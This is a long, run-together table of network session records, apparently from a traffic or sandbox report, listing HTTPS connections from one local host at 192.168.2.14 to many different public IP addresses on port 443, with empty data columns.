                                      10762192.168.2.1435234152.243.7.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10763192.168.2.1438360144.190.76.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10764192.168.2.145701067.98.168.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10765192.168.2.1434422102.93.3.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10766192.168.2.143331825.139.188.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10767192.168.2.1453648151.8.0.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10768192.168.2.1446366105.188.70.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10769192.168.2.1448440212.117.112.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10770192.168.2.1438490219.245.80.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10771192.168.2.143948435.167.92.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10772192.168.2.144313645.44.43.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10773192.168.2.1445792211.161.246.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10774192.168.2.1449968157.58.186.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10775192.168.2.1459412140.175.105.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10776192.168.2.144749472.11.160.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10777192.168.2.1442478115.159.245.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10778192.168.2.1453294119.138.170.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10779192.168.2.145738275.232.183.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10780192.168.2.1456782113.51.3.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10781192.168.2.143499451.50.62.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10782192.168.2.1449494124.235.206.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10783192.168.2.1460316209.198.114.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10784192.168.2.1459270121.130.223.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10785192.168.2.145980663.13.172.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10786192.168.2.144616248.87.157.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10787192.168.2.1443730142.156.130.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10788192.168.2.1445744200.252.84.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10789192.168.2.145276272.71.240.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10790192.168.2.1454382106.166.86.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10791192.168.2.145090273.223.155.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10792192.168.2.1448352100.49.166.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10793192.168.2.1443492178.246.99.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10794192.168.2.1433060189.41.112.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10795192.168.2.144425638.22.156.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10796192.168.2.1450528155.169.226.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10797192.168.2.144777450.169.108.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10798192.168.2.144337859.147.136.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10799192.168.2.1444364156.131.96.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10800192.168.2.1434236114.21.218.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10801192.168.2.1436636213.208.232.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10802192.168.2.1435418129.188.198.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10803192.168.2.145033836.9.252.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10804192.168.2.1455378151.97.133.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10805192.168.2.1451456115.92.181.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10806192.168.2.145124689.103.163.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10807192.168.2.14490688.67.166.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10808192.168.2.1456082161.155.200.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10809192.168.2.1449952159.3.155.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10810192.168.2.1457260213.104.90.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10811192.168.2.14553182.154.60.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10812192.168.2.1442790196.14.44.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10813192.168.2.14513121.150.48.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10814192.168.2.1439618119.9.197.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10815192.168.2.14386048.162.228.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10816192.168.2.1445976108.212.63.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10817192.168.2.1455326124.88.166.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10818192.168.2.1458386136.107.218.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10819192.168.2.1442486212.177.211.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10820192.168.2.1454742133.179.117.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10821192.168.2.1456098101.119.29.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10822192.168.2.1448780188.195.17.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10823192.168.2.143930494.229.168.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10824192.168.2.1438500147.123.112.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10825192.168.2.1447428182.84.127.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10826192.168.2.1451610115.176.160.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10827192.168.2.1438236213.138.103.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10828192.168.2.1458038130.118.63.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10829192.168.2.1435312204.204.164.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10830192.168.2.143620664.51.43.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10831192.168.2.145008632.20.222.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10832192.168.2.14581101.110.162.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10833192.168.2.1443498118.231.185.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10834192.168.2.1458616197.204.21.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10835192.168.2.145253488.50.181.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10836192.168.2.1456426187.78.163.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10837192.168.2.1433576104.16.203.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10838192.168.2.144750694.7.215.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10839192.168.2.1457744121.126.65.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10840192.168.2.1451672188.164.75.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10841192.168.2.145725236.38.73.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10842192.168.2.1449804172.205.6.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10843192.168.2.1443656120.199.184.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10844192.168.2.1450610191.182.28.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10845192.168.2.1438092126.128.176.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10846192.168.2.143416274.233.187.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10847192.168.2.1441758112.226.8.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10848192.168.2.1452416160.150.81.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10849192.168.2.1451914220.44.236.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10850192.168.2.1436564126.52.28.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10851192.168.2.145061660.98.134.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10852192.168.2.1436258132.189.134.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10853192.168.2.1437196217.158.226.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10854192.168.2.1453134203.119.178.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10855192.168.2.144017861.36.113.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10856192.168.2.145851899.243.127.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10857192.168.2.1457008135.239.0.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10858192.168.2.144627081.147.107.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10859192.168.2.1455702157.44.162.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10860192.168.2.145176831.57.69.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10861192.168.2.1440108182.65.48.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10862192.168.2.1450184141.252.72.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10863192.168.2.144655035.115.4.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10864192.168.2.1453516183.10.111.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10865192.168.2.1435886160.187.60.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10866192.168.2.1442098208.106.199.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10867192.168.2.1449034159.253.7.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10868192.168.2.1450284163.48.140.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10869192.168.2.14334528.238.163.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10870192.168.2.1442106150.201.227.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10871192.168.2.1449072138.229.167.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10872192.168.2.144874686.220.206.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10873192.168.2.145961037.205.234.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10874192.168.2.143659019.91.156.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10875192.168.2.145524051.102.24.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10876192.168.2.1438034179.152.5.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10877192.168.2.1446026199.130.144.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10878192.168.2.143640882.31.73.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10879192.168.2.14412308.8.248.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10880192.168.2.1433330189.43.124.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10881192.168.2.143645618.69.137.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10882192.168.2.1455810180.224.62.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10883192.168.2.1445350191.13.15.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10884192.168.2.1451652168.193.193.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10885192.168.2.145459267.33.20.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10886192.168.2.1457832119.39.33.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10887192.168.2.145169676.140.125.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10888192.168.2.143349484.170.56.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10889192.168.2.144302250.59.200.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10890192.168.2.145472642.75.240.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10891192.168.2.1452900206.253.253.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10892192.168.2.145910090.118.239.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10893192.168.2.143931653.37.211.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10894192.168.2.1460234155.156.75.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10895192.168.2.1435722113.118.49.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10896192.168.2.143314276.209.150.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10897192.168.2.1441324130.110.222.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10898192.168.2.1458604100.210.251.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10899192.168.2.1438032168.192.19.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10900192.168.2.144942413.231.166.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10901192.168.2.146073066.66.6.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10902192.168.2.143947832.100.212.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10903192.168.2.1447446178.143.232.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10904192.168.2.145341843.148.51.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10905192.168.2.1439164187.4.121.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10906192.168.2.1453228130.160.175.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10907192.168.2.145772625.189.64.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10908192.168.2.1438658153.136.104.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10909192.168.2.1434696106.117.237.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10910192.168.2.145895838.241.141.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10911192.168.2.145459292.160.122.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10912192.168.2.1439050200.107.156.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10913192.168.2.1456070191.200.54.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10914192.168.2.145518886.65.153.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10915192.168.2.144713678.37.170.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10916192.168.2.145935653.70.116.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10917192.168.2.143520858.124.203.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10918192.168.2.144302897.182.14.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10919192.168.2.144553883.177.136.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10920192.168.2.143595243.4.193.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10921192.168.2.1450782198.122.146.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10922192.168.2.1438936143.83.16.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10923192.168.2.1442672165.141.76.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10924192.168.2.14379104.77.131.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10925192.168.2.144003417.155.253.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10926192.168.2.1444638149.242.31.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10927192.168.2.145064049.117.21.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10928192.168.2.145708440.205.22.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10929192.168.2.143867047.111.107.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10930192.168.2.1459990117.5.205.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10931192.168.2.143760625.84.82.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10932192.168.2.143283841.146.181.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10933192.168.2.1450436162.36.81.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10934192.168.2.1455470161.197.110.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10935192.168.2.1437934130.143.21.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10936192.168.2.144230488.193.253.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10937192.168.2.1455508130.229.42.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10938192.168.2.1450016143.23.124.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10939192.168.2.1434540125.175.212.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10940192.168.2.1452574126.73.103.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10941192.168.2.1453008206.7.61.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10942192.168.2.1454834114.59.142.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10943192.168.2.1458694143.1.203.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10944192.168.2.14485705.252.127.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10945192.168.2.1442674110.113.187.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10946192.168.2.1446876174.97.211.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10947192.168.2.1440204186.102.222.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10948192.168.2.144281054.134.99.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10949192.168.2.145405275.121.227.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10950192.168.2.1452386161.163.40.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10951192.168.2.145423052.219.180.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10952192.168.2.145789288.21.229.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10953192.168.2.145841496.123.200.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10954192.168.2.1441072149.34.186.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10955192.168.2.1449692101.95.206.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10956192.168.2.144752479.118.29.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10957192.168.2.1453164167.255.81.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10958192.168.2.1458176208.138.203.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10959192.168.2.144832239.27.137.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10960192.168.2.1434818169.177.237.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10961192.168.2.1448978160.78.103.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10962192.168.2.1441794114.62.84.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10963192.168.2.144859237.94.229.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10964192.168.2.1441790203.232.255.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10965192.168.2.144519049.210.250.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10966192.168.2.1454970211.196.14.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10967192.168.2.1450170221.31.215.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10968192.168.2.145969834.92.186.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10969192.168.2.143511861.240.175.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10970192.168.2.143889886.179.132.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10971192.168.2.1441640129.184.87.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10972192.168.2.1440796153.87.150.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10973192.168.2.1441538158.251.188.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10974192.168.2.1441048113.164.76.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10975192.168.2.1453068152.207.222.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10976192.168.2.145050432.179.232.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10977192.168.2.1436092142.159.184.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10978192.168.2.1457164184.218.143.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10979192.168.2.145817258.95.41.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10980192.168.2.1436178157.79.243.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10981192.168.2.144388696.33.205.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10982192.168.2.14506165.176.20.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10983192.168.2.144414827.92.2.59443
                                      TimestampBytes transferredDirectionData


